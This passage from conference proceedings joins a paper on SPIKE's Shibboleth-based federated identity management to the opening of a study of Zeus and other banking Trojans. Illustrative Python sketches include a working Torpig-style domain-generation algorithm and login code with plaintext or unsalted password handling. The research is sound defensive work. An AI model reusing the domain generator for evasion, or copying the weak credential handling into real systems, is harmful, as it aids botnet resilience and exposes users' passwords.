A: Network Enterprise Layer – at level A different companies offer their particular tacit and explicit knowledge, expertise, resources and skills. All involved companies are characterized by a number of criteria like strategic position, size of company, market, location, and so on.<br />
B: Conceptual SPIKE Layer – the Service Mediator of this layer combines all provided tangible and intangible resources and coordinates them according to the requirements of the market, which then form a new product (see Figure 1 B).<br />
Level B also contains mapping instruments to assign the involved companies and their services and capabilities to the tasks of the business process. This layer particularly supports the selection, orchestration, management and execution of several kinds of services in a controlled way.<br />

2.2 Security functions in SPIKE<br />

When participating in the SPIKE platform, companies/users first state their identity. The system then validates the user’s claimed identity (authentication). Both steps precede access control, which aims at preventing unauthorized use of a resource as well as use of resources in an unauthorized way.<br />

As identities in virtual cooperations are not anonymous, trust and reputation mechanisms are key to the success of open, dynamic and service-oriented virtual collaborations: they lead to social trust between the persons involved and are therefore the best strategy to ensure virtual cooperation. However, this trust is based on repeated interactions, which can succeed or fail. Therefore a key aspect of our approach is the permanent process of analysing and evaluating interactions, which automatically determines trust.<br />
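The automatic derivation of trust from interaction outcomes can be sketched with a simple success-ratio model; this particular formula is an illustrative assumption, one of many reputation models of the kind surveyed by Josang, Ismail and Boyd (2007).

```python
# Hypothetical sketch: trust derived from the outcomes (success/failure)
# of previous interactions. A uniform prior means a partner with no
# history starts at a neutral 0.5 rather than at 0 or 1.

def trust(outcomes, prior_successes=1, prior_failures=1):
    """outcomes: iterable of booleans (True = successful interaction).
    Returns a trust value in (0, 1) that rises with repeated successes."""
    successes = sum(1 for o in outcomes if o) + prior_successes
    failures = sum(1 for o in outcomes if not o) + prior_failures
    return successes / (successes + failures)
```

Re-evaluating this value after every interaction gives exactly the permanent analysis-and-evaluation loop described above.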

In recent years trust has mostly been connected with and analysed in combination with technical security issues, and several definitions have been developed on this basis (Josang, Ismail and Boyd 2007; Artz and Gil 2007). For our discussion we understand trust as more human-centric: it relies on previous interactions and improves human collaboration supported by technical systems in a virtual environment. Here, communication is the basis for directly influencing trust between individuals in business collaborations (Economist 2008) and relies on the experiences of previous interactions (Billhardt, Hermoso, Ossowski and Centeno 2007; Mui, Mohtashemi and Halberstadt 2002) and the similarity of interests and skills (Matsuo and Yamamoto 2009). In addition, especially in social networks and collaborations, trust is strongly related to information disclosure, identity management and privacy, and can also be used as a basic model to improve document recommendations to better match the interests of users.<br />


Figure 1: Creation of dynamic value chains for eCollaboration<br />

This paper focuses on Federated Identity Management, which is based on trust. Fuchs and Pernul (2007) define the environment of an Identity Management system as an integrated, comprehensive framework which is based on three pillars: policies, processes and the technologies used. Identity Management processes deal with user management, organisational as well as technical approval workflows, and escalation procedures. They form the main administrative workload as they encompass the management of the whole user lifecycle. In order to regulate identity-related information flows and processes, policies have to be defined. For example, policies express regulations for user management processes, delegation issues or general security requirements. The third pillar, technologies, can be subdivided into the following three main components:<br />

Directory services provide synchronised information about users and resources forming the<br />

foundation of a comprehensive identity management infrastructure.<br />


User management deals with the process of managing digital identities throughout their lifecycle,<br />

starting with the creation of accounts, maintenance, i.e. by processing change requests, up to the<br />

deactivation or termination.<br />

Access management deals with the authentication and authorisation of users, controlling access<br />

to connected resources.<br />
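The interplay of the three components can be sketched in a few lines; the class and attribute names are invented for illustration and do not correspond to any specific IDM product.

```python
# Hypothetical sketch of the three technology components: a directory
# holding user records, user management over the account lifecycle, and
# access management checking authorisation against those records.

class Directory:
    def __init__(self):
        self.users = {}  # directory service: the synchronised user records

    # --- user management: lifecycle from creation to deactivation ---
    def create(self, uid, attributes):
        self.users[uid] = {"active": True, **attributes}

    def deactivate(self, uid):
        self.users[uid]["active"] = False

    # --- access management: authenticate-then-authorise ---
    def may_access(self, uid, resource):
        user = self.users.get(uid)
        return bool(user and user["active"]
                    and resource in user.get("permissions", set()))
```

Note how deactivation (end of the lifecycle) immediately revokes all access without touching the permission data itself.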

2.3 Identity management architecture<br />

First of all, the term Identity Management needs to be discussed in detail, since within the SPIKE project two meanings have to be distinguished. Companies manage the digital identities of their users in their own IDM systems, which is called in-house IDM. When those identities are used in an inter-organisational manner, we speak of federated IDM. The federated IDM system of SPIKE is based on Shibboleth. Shibboleth is needed to make use of the digital identities in an inter-organisational context, i.e. the identity information of User A from Company A is used to access Resource X managed by Company Y. Shibboleth mainly consists of three components: the Where Are You From service (WAYF), the Shibboleth Service Provider (Shib SP) and the Shibboleth Identity Provider (Shib IdP).<br />
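The resulting round trip – WAYF lookup, IdP authentication, SP authorisation – can be sketched as follows. All names are invented, and a real Shibboleth deployment exchanges signed SAML assertions over HTTP rather than performing dictionary lookups; this is only a sketch of the control flow.

```python
# Hypothetical registries standing in for the WAYF service and the
# identity providers' user directories.
WAYF = {"alice@company-a.example": "idp.company-a.example"}

IDP_DIRECTORY = {
    "idp.company-a.example": {
        "alice@company-a.example": {"password": "s3cret", "role": "engineer"},
    }
}

def access_resource(user, password, required_role):
    """Service-provider view of the federated login flow."""
    idp = WAYF.get(user)                    # 1. WAYF: where are you from?
    if idp is None:
        return False
    record = IDP_DIRECTORY[idp].get(user)   # 2. IdP authenticates the user
    if record is None or record["password"] != password:
        return False
    return record["role"] == required_role  # 3. SP authorises on attributes
```

The key property mirrored here is that the password never reaches the service provider: only the IdP checks it, and the SP decides on released attributes.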

SPIKE requires connecting to the existing IDM systems of the collaborating companies, so that already existing digital identities can be used in an inter-organisational manner. However, the SPIKE project targets organisations of all sizes, from small and medium-sized enterprises to large organisations. Large organisations and many medium-sized companies usually run their own IDM systems, but small and sometimes also medium-sized companies do not operate an IDM system. Therefore, SPIKE must distinguish between these two cases (companies without an IDMS and companies with an IDMS).<br />

Figure 2 shows the generic Identity Management architecture of SPIKE. The figure is reduced to the IDM-relevant components to describe the basic idea of SPIKE’s IDM. SPIKE considers both companies running their own IDM solutions and enterprises without an IDM system.<br />

Figure 2: SPIKE IDM architecture<br />

In Figure 2, Company A for instance represents a small enterprise employing only a handful of people. Such a company might not have the comprehensive IDM system required to participate in virtual alliances operated by SPIKE. To enable such companies to take part in an online collaboration, SPIKE runs its own IDM solution and thereby fills this gap. For this purpose, the SPIKE platform has its own Shibboleth IdP installed, which is connected with SPIKE’s IDM solution. The SPIKE Shibboleth IdP is registered on the SPIKE WAYF service. The IDMS of SPIKE can be accessed via the SPIKE portal.<br />


Company B, on the other hand, represents all enterprises running their own IDM systems. These companies have to install and configure the Shibboleth IdP software on IT systems within their company and connect their IDM solution appropriately. Furthermore, the Shib IdPs have to be registered and connected with the SPIKE WAYF service. Such companies do not need SPIKE’s IDMS.<br />

In the following, two sequence diagrams show, at a high level, the general procedure for connecting an external IDMS to SPIKE as well as for making use of SPIKE’s integrated IDM solution. The diagrams shown are reduced to the IDM-related steps.<br />

Figure 3 represents the high-level procedure for connecting an external IDMS with the SPIKE platform. First, an administrator of the collaborating company has to install and configure the Shibboleth IdP software (1). After that, a connection between the company’s IDMS and the Shibboleth IdP needs to be set up by registering the IDMS (2). According to the attributes required by SPIKE and by the respective resources provided by the alliance partners, the administrator of the company can assign attributes to the involved digital identities (3). The attributes required to access a resource provided by a service provider are defined during the configuration phase of the SP [D7.2b]. After the project has finished, all connections are disabled and the Shibboleth IdP is uninstalled (4).<br />

Figure 3: Connecting external IDMS with SPIKE<br />

Figure 4 shows a high-level procedure for using SPIKE’s IDMS.<br />

Figure 4: Using SPIKE IDM system<br />

In order to make use of SPIKE’s IDMS, the SPIKE administrator first has to create a user account, equipped with sufficient access rights and attributes, for the responsible user of the particular company (1). The administrator of company N then establishes the needed digital identities in the IDMS of SPIKE. Attributes are assigned according to the attributes required by SPIKE and the resources provided by the partners. When an employee leaves the project or the company, or the project ends, the company’s administrator destroys those digital identities (2). In the third step, the SPIKE administrator deletes the admin account of the respective company after the collaboration project has finished (3).<br />

By means of the IDM solutions – either the companies’ own IDM or SPIKE’s IDM – the collaboration partners can manage their users and the respective attributes themselves, thereby realising the paradigm of federated identity management.<br />

2.4 Evaluation of the applicability of potential solutions for identity management<br />

architecture<br />

In this section a brief evaluation of the applicability of potential solutions is given: two candidates, Apache DS and OpenLDAP, are compared and evaluated against the requirements defined in section 2.2. Table 1 shows this comparison based on the requirements for SPIKE’s integrated IDMS. Both solutions fulfil the defined requirements if respective admin GUIs are used in addition. However, during the test phase we also recognized some minor differences leading to our decision, described in the following.<br />

Table 1: Comparison between Apache Directory Server and OpenLDAP<br />

Identity Management processes mainly deal with user management and security policies. Apache Directory Server, in conjunction with its corresponding administration tool Apache Directory Studio, offers the possibility to create, delete, and change user accounts and attributes. Thus, users can be administrated via Apache Directory Studio; Apache DS itself does not provide an admin GUI by default. Apache DS also covers the three main technology components: directory services, user management and access management. Furthermore, it is possible to monitor and log all carried-out actions in order to comply with any kind of legal obligation or regulation. Apache DS also enables the definition and application of policies. For instance, policies for the quality of a user password in terms of the string length, the usage of special signs, etc. can be defined.<br />
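Such a password-quality policy can be sketched as a simple predicate; the thresholds below are illustrative assumptions, not Apache DS defaults.

```python
import string

# Hypothetical sketch of a password-quality policy of the kind described
# above: minimum length plus a minimum number of special characters.

def password_ok(pw, min_length=8, min_special=1):
    """Return True if the password satisfies the (illustrative) policy."""
    specials = sum(1 for c in pw if c in string.punctuation)
    return len(pw) >= min_length and specials >= min_special
```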

Summarizing, Apache DS and OpenLDAP fulfil all defined requirements, support auditing functionality, and require a separate tool for administration.<br />

In the following, a special application case is presented, starting with a discussion of the user requirements.<br />


3. Application case: identity federations<br />

3.1 User requirements<br />

Prior to the introduction of the Identity Management System (IDMS) in 2005, access information on file shares, computers and accounts was distributed across several systems like Active Directory, SunOne and other applications. Those systems worked independently, and there was no mechanism available to guarantee consistent data (e.g. departments, cost centers, phone numbers and names of persons), based on delivery from designated master systems, throughout the different systems deployed in the company. Thus, helpdesk support was required frequently.<br />

Therefore Infineon introduced the IDMS to have a mechanism at hand to collect data from the different master systems, combine the necessary data into digital identities, and distribute and enforce this identity information consistently throughout the different directory services and applications. In order to improve the IDMS and secure the return on investment, an automatic user provisioning system and RBAC have to be set up in a next step.<br />

The major function of provisioning is that once a new identity enters the IDMS from the global HR system, an automatic workflow is triggered for its manager, based on certain attributes (like location and manager information). The respective manager chooses the appropriate roles for the new employee and, depending on the request, the necessary access to resources (accounts, groups, group memberships) is set up by the IDMS (mostly, no human interaction is necessary anymore). During the life cycle of the identity, roles are added and removed, and once an employee leaves the company, access to his resources is disabled completely. The last case is also called de-provisioning. A basic approach for provisioning (without a portal and workflow solution) was developed and implemented at Infineon in 2007. The results are shown in (Obiltschnig 2007).<br />
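The provisioning and de-provisioning flow just described can be sketched as follows; the role names, resource names and data layout are invented for illustration and are not Infineon's actual role model.

```python
# Hypothetical sketch: roles map to resource accesses; provisioning
# derives an identity's access set from the roles its manager chose,
# and de-provisioning removes everything on exit.

ROLE_RESOURCES = {
    "designer": {"design-share", "eda-tools"},
    "manager": {"reporting-portal"},
}

def provision(identity, roles):
    """Manager has chosen the roles; derive the resource accesses."""
    identity["roles"] = set(roles)
    identity["access"] = set()
    for role in roles:
        identity["access"] |= ROLE_RESOURCES[role]
    return identity

def deprovision(identity):
    """Employee leaves: disable access to all resources completely."""
    identity["roles"].clear()
    identity["access"].clear()
    return identity
```

Because access is always derived from roles rather than granted per resource, removing a role (or the whole identity) revokes all associated accesses in one step.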

Another issue which cannot be tackled exclusively by a centrally organized IDMS is collaboration with external partners. This topic has been researched in depth for more than two decades: research in this area started in the mid-1980s and is still ongoing. Well-known and representative terms used for enterprise collaboration (alliances) are Virtual Organizations (Skyrme 2007), Networked Organizations (Lipnack and Stamps 1994) and Collaborative Innovation Networks [GL06]. The so-called Virtual Team represents another well-known expression on the micro-level (Lipnack and Stamps 1997).<br />

A common sense of the mentioned concepts can be summarized by the following aspects (Lipnack<br />

and Stamps 1997):<br />

Independent people and groups act as independent nodes in a network,<br />

Are linked across conventional boundaries (e.g. departments and geographies)<br />

And work together for a common purpose.<br />

A collaboration has multiple leaders, lots of voluntary links and interacting levels,<br />

Is based on mutual responsibility, i.e. there is no hierarchical management structure but the<br />

involved individuals act as equal partners,<br />

And teams are readjusted or disbanded as needed.<br />

A successful collaboration requires the fulfilment of the following principles (Skyrme 2007):<br />
Each partner must contribute some distinctive added value to the cooperation.<br />
Members must develop a high degree of mutual trust and understanding. Thus, similar groups or even the same people will work together again and again.<br />
Projects or whole services should be the focus of the cooperation.<br />
In the run-up to a collaboration, one has to define general rules of engagement in terms of inputs to the cooperation and the rewards expected, though momentum is lost if these become too formalized too soon.<br />
Members of the cooperation should recognize the need for coordination roles and either commit time to develop and nurture these roles or pay one of the members to undertake the coordination roles on their behalf.<br />


A clear interface needs to be developed with non-virtual customers – they like tidy relationships and clear contracts. Thus either one member of the virtual cooperation must act on behalf of the others (using them as subcontractors), or a joint company must be created to act as their legal entity and administration service.<br />

The highly dynamic business forces Infineon to set up strategic alliances (project partnerships) frequently in order to be competitive in cost and time. The chip design process and the production environment (silicon foundries) serve as good examples of necessary alliances. While partnerships in the course of chip design aim at reducing the time to market, alliances during production focus on covering customer demand by increasing the available production capacities. Especially the design process for very complex chips sometimes requires setting up an alliance with one or more competitors to reduce the overall development costs of the chip. For the automotive industry (one of our three business areas), highly-logic special-function chips are designed. The business strategy of Infineon also includes cooperation in terms of an alliance with a customer to develop “next generation” chips which represent a quantum leap in technology and/or function (Schelmer 2008).<br />

Today a complex process for the setup of collaborations exists (see Figure 5).<br />

The process starts with an internal employee requesting an identity entry in the IDMS for the external persons belonging to the other organisations of the business alliance. The following phases include the provisioning of resources and the revocation of access to the respective resources once the alliance ends. This process is applied for each (strategic) alliance in which external staff is involved.<br />

However, this approach requires an internal employee at Infineon to trigger numerous steps before an external alliance partner is able to start performing his tasks. Many individual resources have to be provisioned for the external partners (there is currently neither a role model nor suitable tooling available), accompanied by numerous approval workflows, which slows down the whole setup process. Furthermore, knowledge about the external employees, e.g. which resources they need to access at Infineon, is required in advance (a reduction in flexibility). Moreover, the complete identity information of external persons is currently also kept in the IDMS, which inflates the data volume.<br />

To overcome these deficiencies, the approach of Federated Identity Management (also called identity federations) was established. Its core idea is to allow individuals to use the same accounts and passwords they have in their own company to access the network of another company.<br />

At first, a user's identity data is maintained at an identity provider in its IDMS. In the context of SPIKE, the partner company of INF takes over the role of the identity provider, while INF acts as the service provider during this collaboration. Subsequently, the user tries to access a service (an application, a data source, and so on) of the service provider. Thereby, the user is verified at the identity provider (the collaboration partner) by the service provider (INF). If the identity provider successfully authenticates the user (or, in SPIKE terminology, fulfils the tasks which were negotiated in the collaboration contract), the user is granted access to the requested service.<br />
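This federated flow can be sketched in simplified form. The following is a minimal illustration only, not the SPIKE implementation; the class names (`IdentityProvider`, `ServiceProvider`) and the HMAC-signed assertion are our own assumptions standing in for the contract-based trust described above.<br />

```python
import hashlib
import hmac
import secrets

class IdentityProvider:
    """The partner company: maintains its own users and issues signed assertions."""
    def __init__(self, shared_key: bytes):
        self.shared_key = shared_key
        self.users = {}  # username -> password hash

    def register(self, username, password):
        self.users[username] = hashlib.sha256(password.encode()).hexdigest()

    def authenticate(self, username, password):
        """Return a signed assertion if the local credentials are valid, else None."""
        if self.users.get(username) != hashlib.sha256(password.encode()).hexdigest():
            return None
        nonce = secrets.token_hex(8)
        payload = f"{username}:{nonce}"
        sig = hmac.new(self.shared_key, payload.encode(), hashlib.sha256).hexdigest()
        return f"{payload}:{sig}"

class ServiceProvider:
    """INF's side: trusts assertions signed with the key agreed for the collaboration."""
    def __init__(self, shared_key: bytes):
        self.shared_key = shared_key

    def grant_access(self, assertion):
        username, nonce, sig = assertion.rsplit(":", 2)
        expected = hmac.new(self.shared_key, f"{username}:{nonce}".encode(),
                            hashlib.sha256).hexdigest()
        return hmac.compare_digest(sig, expected)

key = secrets.token_bytes(32)   # trust established by the collaboration contract
idp, sp = IdentityProvider(key), ServiceProvider(key)
idp.register("alice", "s3cret")
assertion = idp.authenticate("alice", "s3cret")
assert assertion is not None and sp.grant_access(assertion)
```

In SPIKE terms, the shared key stands for the trust negotiated in the collaboration contract, and `grant_access` corresponds to the service provider accepting the identity provider's verification of the user.<br />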

Business partners trust each other's user authentication mechanisms and guarantee that only authenticated users will have access to the services (resources, applications) of the alliance partner. This is a precondition for companies to use applications jointly without being forced to use the same directory services or authentication mechanisms, or to duplicate digital identities into the other system.<br />

Federated Identity Management also reduces the administration overhead in an alliance because the collaboration partner is not required to know in advance which employees need access to the resources of the alliance partner. The identity provider also has considerable flexibility to manage (exchange, increase, decrease) the staff during the existence of the alliance according to the needs of the service provider. The service provider only has to manage access to the applications needed by both companies (e.g. design applications in the chip design area or administration applications in the IT area, and so on).<br />

In the next chapters, the requirements of the component SPIKE/IF (identity federation module) of a life cycle model for collaborations are described in order to overcome the mentioned deficiencies.<br />


Figure 5: Creation process for external collaboration partners<br />

3.2 Description of the requirements for connecting to external IDM<br />

Federated Identity Management enables the usage of digital identities in an inter-organisational way. This means that users can use their local digital identity at their home company in order to access shared resources within collaborations. A fundamental precondition is the administration of digital identities in an IDMS which needs to be connected with SPIKE. For organisations willing to participate in collaborations operated by SPIKE, we identified some technical requirements which must be fulfilled; they are presented in the next sections:<br />

3.2.1 Overview<br />

The SPIKE Identity Federation Module (SPIKE/IF for short) is the building block in the architecture (see next figure) for setting up collaborations between companies, defining roles and resource bundles, and managing access for federated identities during a collaboration.<br />

In Figure 6 the collaboration model is shown. Before a company can take part in any collaboration, the phase “collaboration setup” has to be passed. This phase describes the tasks of a company's administrator to provide the required resources. The most basic resource to be provided is the network configuration.<br />

Figure 6: Identity federation life cycle model<br />

3.2.2 Setting up a collaboration<br />

In our project, different types of collaboration are possible, depending on who carries out the service provider function in the collaboration.<br />

Users of a company can only be assigned to services of a partner company by the responsible persons of their own company (security, reduced complexity, retained flexibility). Only the hub company can extend a collaboration with additional partner companies (a security aspect). In the following, the setting up of a collaboration is visualized.<br />

Unfortunately, collaborative applications nowadays commonly use centralized infrastructures. The use of such systems has generated huge interest in decentralized systems, so that in our case different types of collaboration are possible depending on who carries out the service provider function in the collaboration. In the following, the centralized collaboration is presented (figure 8):<br />



Figure 7: Steps to set up a collaboration<br />

Figure 8: Centralized collaboration<br />


In the case of a centralized collaboration, only the hub company offers services, which are accessed by the partners. The partner companies only act as identity providers for their federated users. This type of collaboration mostly appears when only one large company is involved which offers a large service and application landscape with complex business processes supported by workflow management systems, and when the partners are mostly smaller companies without a service infrastructure of their own but with specialized and/or cost-efficient employees who take over whole outsourced services of the hub company.<br />

In the case of a decentralized collaboration (see figure 9), all partners offer services in the collaboration and act as service providers which are accessed mutually. All partners act as identity providers for their federated users. This type of collaboration often appears when one or more large companies are involved which offer a large service and application landscape with complex business processes supported by workflow management systems and whose workflows include the involvement of highly specialized partner companies, or when the partners are companies with few but highly specialized services which can be offered cost-efficiently.<br />

Figure 9: Decentralized collaboration<br />

3.2.3 Role and resource management<br />

Modeling roles is a research topic with a long history. There are many approaches (Ferraiolo, Kuhn and Chandramouli 2003) which are more or less successful. They can be classified according to three different strategies:<br />

Top-down is based on the analysis of business processes and organizational structures;<br />

Bottom-up tries to analyze information about existing permissions throughout different systems and aggregate similar patterns (clusters) into roles;<br />

Hybrid approaches combine both strategies.<br />
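The bottom-up strategy can be illustrated with a minimal sketch that clusters users with identical permission sets into candidate roles. This is our own illustration, not the SPIKE tooling; the function `mine_roles` and the sample permission data are hypothetical.<br />

```python
from collections import defaultdict

def mine_roles(user_permissions):
    """Bottom-up role mining: users holding identical permission sets
    across the systems are aggregated into one candidate role."""
    clusters = defaultdict(list)
    for user, perms in user_permissions.items():
        clusters[frozenset(perms)].append(user)
    # one candidate role per distinct permission set
    return [{"role": f"role_{i}",
             "permissions": sorted(perms),
             "members": sorted(users)}
            for i, (perms, users) in enumerate(
                sorted(clusters.items(), key=lambda c: sorted(c[0])))]

# hypothetical existing permissions collected from different systems
perms = {
    "anna":  {"design_app", "wiki"},
    "bernd": {"design_app", "wiki"},
    "clara": {"admin_console"},
}
roles = mine_roles(perms)
# two candidate roles emerge: one shared by anna/bernd, one for clara
```

A hybrid approach would then reconcile such mined candidates against roles derived top-down from the business processes.<br />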

The necessary steps during resource and role management are modelled in figure 10.<br />


Figure 10: Steps during role and resource management<br />

4. Conclusions<br />

In this paper, the architecture of the SPIKE IDMS is presented and it is shown how it can be integrated with an IdP. The SPIKE IDMS is intended to work mainly for SMEs which do not own a proprietary IDMS and therefore need this extra tool when a collaboration within SPIKE is started. In doing so, we improve the opportunities of SMEs in a globalising world.<br />

References<br />

Artz, D. and Gil, Y. (2007) "A survey of trust in computer science and the semantic web", Journal of Web Semantics, Vol 5, No. 2, pp 58-71.<br />
Billhardt, H., Hermoso, R., Ossowski, S. and Centeno, R. (2007) "Trust-based service provider selection in open environments", ACM Symposium on Applied Computing (SAC), pp 1375-1380.<br />
Davenport, T.H. and Prusak, L. (1998) Working Knowledge: How Organizations Manage What They Know, Harvard Business School Press, Boston MA.<br />
Ferraiolo, D.F., Kuhn, R.D. and Chandramouli, R. (2003) Role-Based Access Control, Artech House.<br />
Economist (2008) "The role of trust in business collaboration. An Economist Intelligence Unit", Cisco Systems, Vol 10, No. 70.<br />
Fuchs, L. and Pernul, G. (2007) "Supporting Compliant and Secure User Handling - A Structured Approach for In-House Identity Management", The Second International Conference on Availability, Reliability and Security (ARES 2007), IEEE Society, Los Alamitos, pp 374-384.<br />
Jackson, G. (2010) "Identity and Access Management", [online], The University of Chicago, Overview paper, www.internet2.edu/pubs/200703-ISMW.pdf.<br />
Josang, A., Ismail, R. and Boyd, D. (2007) "A survey of trust and reputation systems for online service provision", Decision Support Systems, Vol 43, No. 2, pp 618-644.<br />
Klein, R., Rai, A. and Straub, D.W. (2007) "Competitive and cooperative positioning in supply chain logistics relationships", Decision Sciences, Vol 38, No. 4, pp 611-646.<br />
Lipnack, J. and Stamps, J. (1994) The Age of the Network - Organizing Principles for the 21st Century, John Wiley & Sons.<br />
Lipnack, J. and Stamps, J. (1997) Virtual Teams - Reaching Across Space, Time and Organizations with Technology, John Wiley & Sons.<br />
Matsuo, Y. and Yamamoto, H. (2009) "Community gravity: Measuring bidirectional effects by trust and rating on online social networks", International World Wide Web Conference (WWW), pp 751-760.<br />
Mohrman, S.A., Finegold, D. and Mohrman, A.M. (2003) "An empirical model of the organization knowledge system in new product development firms", Journal of Engineering Technology Management, Vol 20, No. 1, pp 7-38.<br />
Mori, J., Sugiyama, T. and Matsuo, Y. (2005) "Real-world oriented information sharing using social networks", Group, pp 81-85.<br />
Mui, L., Mohtashemi, M. and Halberstadt, A. (2002) "A computational model of trust and reputation for e-Business", Hawaii International Conference on System Sciences (HICSS), p 188.<br />
Obiltschnig, A. (2007) Role-based Provisioning - Ein praktischer Ansatz im Identity Management, Institute for Applied Computer Science, Faculty for Technical Sciences, University of Klagenfurt, Klagenfurt.<br />
Schmelmer, M. (2008) "Infineon setzt bei IT auf Einsparungen", [online], www.cio.de/strategien/methoden/850789/index.html.<br />
Semmelrock-Picej, M.Th. and Possegger, A. (2010) "Ausgewählte sicherheitsrelevante Aspekte der eCollaboration", D-A-CH Security 2010, pp 314-325.<br />
Skyrme, D. (2007) "Insights", [online], www.skyrme.com/insights/.<br />
Zack, M.M. (1999) "Managing codified knowledge", Sloan Management Review, Vol 40, No. 4, pp 45-58.<br />
Ziener, K. (2010) Grenzüberschreitende Wirtschaftskooperationen und Interreg III A Projekte, Klagenfurt.<br />


Anatomy of Banking Trojans – Zeus Crimeware (How Similar are its Variants)<br />

Madhu Shankarapani and Srinivas Mukkamala<br />

(ICASA)/(CAaNES)/New Mexico Institute of Mining and Technology, USA<br />

madhuk@cs.nmt.edu<br />

srinivas@cs.nmt.edu<br />

Abstract: To add complexity to existing cyber threats, targeted Crimeware that steals personal information for financial gain is for sale for as little as $700. Banking Trojans have been notoriously difficult to kill, and to date most antivirus and security technologies fail to detect them or prevent them from causing havoc. Zeus, which is considered one of the most nefarious financial and banking Trojans, targets business and financial institutions to perform unauthorized automated clearinghouse (ACH) and wire transfer transactions for check and payment processing. Zeus is causing billions of dollars in losses and is facilitating identity theft of innocent users for financial gain. Zeus Crimeware does one thing very well that every security researcher envies – obfuscation. The Zeus kit conceals the exploit code every time a binary is created. Zeus Crimeware has an inbuilt binary generator that generates a new binary file on every use that is radically different from the others, which evades detection by antivirus or security technologies that rely on signature-based detection. The effectiveness of an up-to-date antivirus against Zeus is thus not 100%, not 90%, not even 50% – it is just 23%, which is alarming. No matter how smart and how different Zeus binaries are, most of them share a few common behavioral patterns, such as the ability to take screenshots of a victim's machine or control it remotely, hijack e-banking sessions and log them to the level of impersonation, add additional pages to a website and monitor them, or steal passwords that have been stored by popular programs and use them. In this paper we present detection algorithms that can help the antivirus community ensure that a variant of a known malware can still be detected without the need to create a signature; a similarity analysis (based on specific quantitative measures) is performed to produce a matrix of similarity scores that can be utilized to determine the likelihood that a piece of code or binary under inspection contains a particular malware. The hypothesis is that all versions of the same malware family or similar malware families share a common core signature that is a combination of several features of the code (binary). Results from our recent experiments on 40 different variants of Zeus show very high similarity scores (over 85%). Interestingly, Zeus variants have high similarity scores with other banking Trojans (Torpig, Bugat, and Clampi) and a well-known data-stealing Trojan, Qakbot. We present experimental results that indicate that our proposed techniques can provide better detection performance against banking Trojans like Zeus Crimeware.<br />

Keywords: Zeus Crimeware, banking Trojans, Torpig, Bugat, Clampi, malware similarity analysis, anatomy of Zeus, malware analytics<br />

1. Introduction<br />

One of the major concerns in network security is controlling the spread of malware over the Internet. In particular, polymorphic and metamorphic versions of malware are the most troublesome among malware families because of their ability not only to infect systems but also to steal confidential user data and remain persistent. These kinds of malware are written with the intent of taking control of a large number of hosts on the Internet. Once hosts are infected by Trojans, they may join a botnet for stealing personal data such as user credentials (Holz, Engelberth and Freiling, 2008), (Kanich et al, 2008). Over time, malware writing has shifted from being done for fun to being done for financial gain.<br />

Trojans in the past were used for sending spam emails, installing third-party malware, keystroke logging, crashing the host machine, and uploading or downloading files on infected machines. Present-generation Trojans are far more complex: when a Trojan notices the user visiting the website of a targeted bank, it springs into action. When the user carries out a transaction, the Trojan looks at the available balance and calculates how much money to steal. These Trojans are given upper and lower bound limits that stay below the amounts that trigger antifraud systems. Zeus, Torpig, Zlob, Vundo and Smitfraud are a few examples of deadly Trojans that have caused major financial loss.<br />

Torpig is a malware program that was developed to steal sensitive information from its infected hosts. In early 2005, over 180 thousand machines were infected and about 70 GB of data were stolen and uploaded to the bot-masters (Stone-Gross et al, 2009), (Nichols, 2009). Torpig depends on domain flux for its main C&C servers, and also uses these servers to perform drive-by-downloads to spread on a network. Using JavaScript, it generates pseudo-random domain names on the fly and redirects victims to a malicious webpage.<br />
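Domain flux can be illustrated schematically: bot and bot-master derive the same candidate domain list from the current date, so no C&C domain needs to be hard-coded. Torpig's actual generation algorithm differs; the generator below (`flux_domains`) is purely an assumed example.<br />

```python
import hashlib
from datetime import date

def flux_domains(day: date, count: int = 3, tld: str = ".com"):
    """Schematic domain-generation algorithm: both bot and bot-master can
    derive the same candidate C&C domains from the current date."""
    domains = []
    for i in range(count):
        seed = f"{day.isoformat()}-{i}".encode()
        digest = hashlib.md5(seed).hexdigest()
        # map hex digits to letters so the label looks like a host name
        label = "".join(chr(ord('a') + int(c, 16) % 26) for c in digest[:12])
        domains.append(label + tld)
    return domains

candidates = flux_domains(date(2011, 3, 17))
# the bot tries each candidate in turn until one resolves to a live C&C server
```

Because the list changes every day, taking down any single registered domain only disrupts the botnet briefly.<br />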

Vundo, also known as VirtuMundo, VirtuMonde, and MS Juan, spreads via email, peer-to-peer file sharing, and other malware (Bell and Chien, 2010). It exploits browser vulnerabilities and displays pop-up advertisements. This Trojan has the capability to inject advertisements into search results. Fraudulent or misleading applications, intrusive pop-ups and fake scan results are characteristics of this Trojan. Vundo lowers security settings, prevents access to certain websites, and also disables antivirus programs to make it even more difficult to remove. Its new variants are far more sophisticated in their payloads and functionality. They have the capability to exploit vulnerabilities to download misleading software, and extensions that encrypt files in order to extort money from the user.<br />

Zeus is a Trojan horse that steals banking information from infected machines and spreads using drive-by-downloads and phishing emails. Since the date it was first identified, Zeus has been very active in the wild, with a constant increase in threat. Most threatening is the large group working on Zeus to create an enormous Zeus/Zbot variant builder, which can evade present anti-virus software.<br />

The problem is so critical that a significant research effort has been invested in gaining a better understanding of these malware characteristics. One approach to studying the characteristics is to perform passive analysis of secondary effects that are caused by the activities of compromised hosts. Many researchers have performed passive analysis, such as collecting spam emails that are likely to have been sent by bots (Zhuang et al, 2008), DNS queries (Rajab et al, 2007), (Rajab et al, 2006) or DNS blacklist queries (Ramachandran, Feamster and Dagon, 2006) performed by the bot-infected machines, and analysis of network traffic for cues that are characteristic of certain botnets (Karasaridis, Rexroad and Hoeflin, 2007).<br />

While these analyses provide interesting insights into particular characteristics of Trojans and bots, the approach is limited to those botnets that actually exhibit the activity targeted by the analysis. Active approaches analyze botnets through infiltration: researchers join the botnet to perform analysis. Usually honeypots or spam traps are used to collect a copy of a malware sample. Later, the obtained samples are executed in a controlled environment to observe their behavior. Observations include the traffic that is exchanged between bots and their command and control server(s) and the IP addresses of other clients that are concurrently logged into the IRC channel (Rajab et al, 2006), (Cooke, Jahanian and McPherson, 2006), (Freiling, Holz and Wicherski, 2005). Unfortunately these techniques do not work on botnets that use stripped-down IRC or HTTP servers as their C&C channels.<br />

